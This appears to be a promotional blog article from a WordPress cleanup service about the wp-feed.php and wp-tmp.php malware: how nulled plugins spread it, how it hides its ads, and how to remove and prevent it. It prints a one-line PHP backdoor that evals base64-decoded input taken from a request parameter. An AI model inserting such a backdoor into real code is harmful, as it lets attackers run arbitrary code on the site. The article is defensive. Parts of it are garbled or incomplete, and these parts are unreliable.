Table of Contents [TOC]
The wp-feed.php & wp-tmp.php malware has spread havoc in the WordPress space. It has been a year of detection of this malware that has affected millions of WordPress websites globally.
What if? After successfully running a website, does your malware scanner warn you that “your site is hacked”? But it looks good to you.
Often visitors complain about the spam ads on the website while the website owner can’t see any.
There is a good chance that your site might be infected with a malware.
Hackers find smart ways to disguise their hacks from site owners so that they go undetected and they can continue exploiting the website for a long time. One of the smartest ways to hide hacks is wp-feed.php.
Hidden from site owners, it displays advertisements for illegal products, drugs, and adult content to your visitors.
Even if you could have detected it, finding all the places where the infection has spread is not only difficult but sometimes impossible. Elimination of the infection is complicated and difficult. If you can remove it, in most cases the infection will reappear. Hackers use the WordPress backdoor to regain access to your WordPress website.
If you have detected any unknown files on your WordPress website with names like wp-feed.php, wp-tmp.php, or wp-vcd.php, chances are your WordPress is compromised.
In this article, you will learn about what is wp-feed.php malware, its working and how to remove wp-feed.php malware in your wordpress site.
Knowing how to act against a wp-feed.php, wp-tmp.php threat won’t do you much good if you don’t know there is one.
But not everyone has the time or knowledge to use the right tools or plugins to locate malware or virus on their WordPress site.
There are a number of signs that your site has been hacked or that malware has been installed.
Let’s dive into the heart of the matter.
WP-Feed is a type of malware that displays malicious advertisements on websites. The goal of this malware is to get your visitors to click on the ads and redirect them to a malicious website.
The infection is usually caused by using nulled plugins and themes infected with malware. Not all WordPress users want to buy premium plugins and themes. People always look for an inexpensive way to develop a website so they use nulled WordPress themes and plugins.
Nulled software is tempting to use because it gives you free premium features. Free software is distributed so that hackers can gain access to your site effortlessly; it is not distributed free of cost as an act of benevolence.
Freemium plugins or themes are sources of malware. When you install a Nulled theme or plugin on your website, you are unwillingly opening doors for hackers to gain access to your site.
Besides Nulled software, outdated plugins and themes can also be vulnerable. Hackers exploit these WordPress vulnerabilities to break into your site.
A vulnerability in the “resize external image” feature allowed hackers to inject PHP code into web servers. The app developer even admitted that he had been hacked due to the faulty app and eventually stopped developing it.
While these vulnerability examples are not alarming, note that you also have to deal with themes and plugins that are distributed directly by hackers and malicious websites. Since WordPress is open-source, anyone can create and distribute plugins. They are generally considered to be useful apps and in many cases, they provide the functionality that is promised.
They also exploit weak usernames and passwords such as “admin” and “password”. Weak credentials are easy to guess. Here you can check the best WordPress security tips & tricks 2024 and learn how to make WordPress safe for you.
An attacker can guess your username and login, and directly implant the wp-feed.php malware into your website.
Once the hackers gain access to your website, they implant two files (wp-feed.php and wp-tmp.php) in your wp-includes folder.
The wp-includes folder is part of your WordPress core. This is where your website theme and other important files are stored.
The WP feed file starts infecting other WordPress files especially function.php which is part of your active theme.
From function.php, hackers can display malicious pop-up ads on your WordPress website.
The real problem is that ads are only shown to new visitors, not repeat visitors. The malware logs visitors to your site to ensure that only new visitors see the ads. It is an effective way to prevent detection.
Therefore, you, as a frequent visitor to your own site, never notice any symptoms of hacking.
You will also notice that your website pages are redirected to another website (spammy and advertising websites). It’s not because redirection plugin, the website has been infected from WordPress hacked redirect malware. Now you must be thinking about how this redirection happened even without no one login wp-admin.
There are two ways of removing the infection. Those are –
If you can log in and go to your WP admin area, you might not need to reload your entire site. Using a WordPress malware scanner can help detect and remove WP-Feed.php malware from your WordPress website.
These detection and protection scanners have sets of rules that allow them to identify files containing suspicious code, with signatures corresponding to those used by malicious scripts. They can also identify files with suspicious attributes that may have been downloaded by hackers.
Unfortunately, even if you use a scanner on your website after being infected, it is possible that malware will escape this identification. This means that intruders always have a “back door” to your system and can return to it whenever they want.
Manual removal of the infection is quite difficult because in this type of infection there are a lot of moving parts.
The hacker downloads two malicious files – wp-feed.php and wp-tmp.php. You need to delete them to get started. This is probably the only easy part.
It is difficult, because it is hard to identify where the infection has spread.
The infection spreads to other WordPress files including the function.php file. It will take you hours to find all the malicious code.
Recognizing malicious code in wordpress theme is difficult because it is well disguised and looks like normal pieces of code.
Some known malicious code, like “eval (base64_decode)“, can be part of legitimate plugins. They are not used in a malicious way. Therefore, removing the code will affect your plugin and may even break your site.
There is a good chance that you are missing pieces of code that could lead to re-infections.
Manual removal is therefore not at all effective.
However, if you still want to do this, please take a full backup of your WordPress website manually & with plugins. If you end up accidentally deleting something and breaking your site, you can quickly restore it to normal.
Hackers can still target your site and try to infect it. You need to make sure that your site is protected from future infections. But before we get into the thick of it, let’s take a look at the impact of wp-feed.php & wp-tmp.php infection.
Let’s take a quick look at how a wp-feed.php & wp-tmp.php malware attack can impact a website.
Websites that have been infected with wp-temp.php will often suffer the following consequences:
The good news is that the WP Hacked Help team is here to clean up and fix your hacked wordpress site. effectively.
No matter how many times it deletes your information or restores a backup to a server that you probably have, there is a chance that you don’t know anything about wp-feed.php & wp-tmp.php, into your website code.
Most backdoor are extremely well disguised that they can be passed over as legitimate code by amateur developers.
We explained that the wp-tmp.php file acts as a backdoor. Hackers insert two files, wp-feed.php & wp-tmp.php, into your website code. If you open the file, you will find a script that looks something like this –
$p = $REQUEST$#91;”m”]; eval(base64_decode ($p));
Now you can protect your site from future hacking attempts by taking the following measures:
Remember: “The only free cheese is in the mousetrap.” We can say the same about nulled WordPress themes and plugins.
There are thousands of plugins and nulled themes on the Internet.
Related Post: WordPress Theme Security – How to Ensure Safety Of Your Theme
If you’ve allowed your users to install plugins and themes, make sure they never use nulled software. Users can download them from various torrent sites for free. What they don’t know is that most of them are infected with malware or SEO black hat links.
Stop using Nulled plugins and themes. It is not only unethical but extremely harmful to WordPress security. You will end up paying more for a developer to clean up your website.
The more you learn about the security of WordPress, the more secure it will be. Check our WordPress Security guide for 2021. We covered how you can protect your WordPress website with the help of these expert tips and tools.
You can prevent wp-feed.php malware in your WordPress folder by changing file permissions. Taking all the necessary precautions to protect your site is good. But not exposing your sensitive data to direct sunlight is even better. In just a few clicks, here are some precautions to be applied quickly:
Placed at the root of your site, this file contains the WordPress version of your site (test with www.yoursite.com/readme.html). If you haven’t been able to keep your site up to date, an older version will have known flaws, and therefore easy ways to crack your access.
You can also prevent hackers from modifying your theme by disabling the file editor. This will prevent them from injecting pop-up ads on your website. You can do this manually, but it is risky and not recommended.
By this means, you allow the reading of these files, but restrict possible modifications to the only owner. To do this, go to Filezilla (or any other ftp browser) and right click on the file and select “File access rights”; then indicate 644 in the field to be completed, then validate. We can also carry out this operation thanks to our WP Hacked Help Security Scanner which identifies and corrects access rights in a single pass.
The most important reason to update your WordPress site is security. Over 30% of all sites are built with WordPress, making it by far the most used CMS in the world. Due to its popularity, WordPress is a target for hackers and distributors of malicious code.
Each WordPress update includes release notes, listing what has been fixed and changed in that update.
Hackers read the release notes and then attempt to exploit them by looking for sites that have not yet been updated. If your site is running on an older version of WordPress, it means it has known vulnerabilities.
Don’t forget your plugins and your theme! Besides the basic installation, plugins and themes can also be exploited. So be sure to update them as well.
Hence, never delay updates.
You can learn more about wordpress security updates here.
Using strong credentials is another nifty method of ensuring security against hacking. They could break your password if it is made up of explicit texts or numbers without any hassle. Make strong passwords, including numbers, special characters, nonsense letters, etc.
The best technique to create a complex password that you want to remember is this:
Wouldn’t it be great if you could prevent hackers from landing on your website in the first place?
A firewall is just the tool you need.
The web application firewall identifies and blocks malicious traffic. Built and maintained by a great team 100% focused on WordPress security.
IP blacklist blocks all requests from the most malicious IP addresses, protecting your site while reducing the load.
Protects your site at the endpoint, allowing deep integration with WordPress. Unlike cloud alternatives, it does not break encryption, cannot be bypassed, and cannot leak data.
The built-in malware scanner blocks requests that include malicious code or content.
Protection against brute force attacks by limiting login attempts.
Dealing with a hacked site?
Our hacked wordpressss cleaning service removes all malicious code including backdoors, redirects, and seo spam links. Our security analysts will also work with over 20 search engine, anti-malware, and anti-spam blacklists like Google and Symantec to remove your site. We provide a full report of what was found and recommendations to keep your site safe.
Special service for K-12 public schools using WordPress?
Wp hacked help is offering free website security audit . please share this offer with a school that could benefit from our services.
Multiple WordPress Sites?
If you’re managing more than one WordPress site and they also might be hacked or infected, we can make your life easier. Get more info here and get in touch with our technical team here.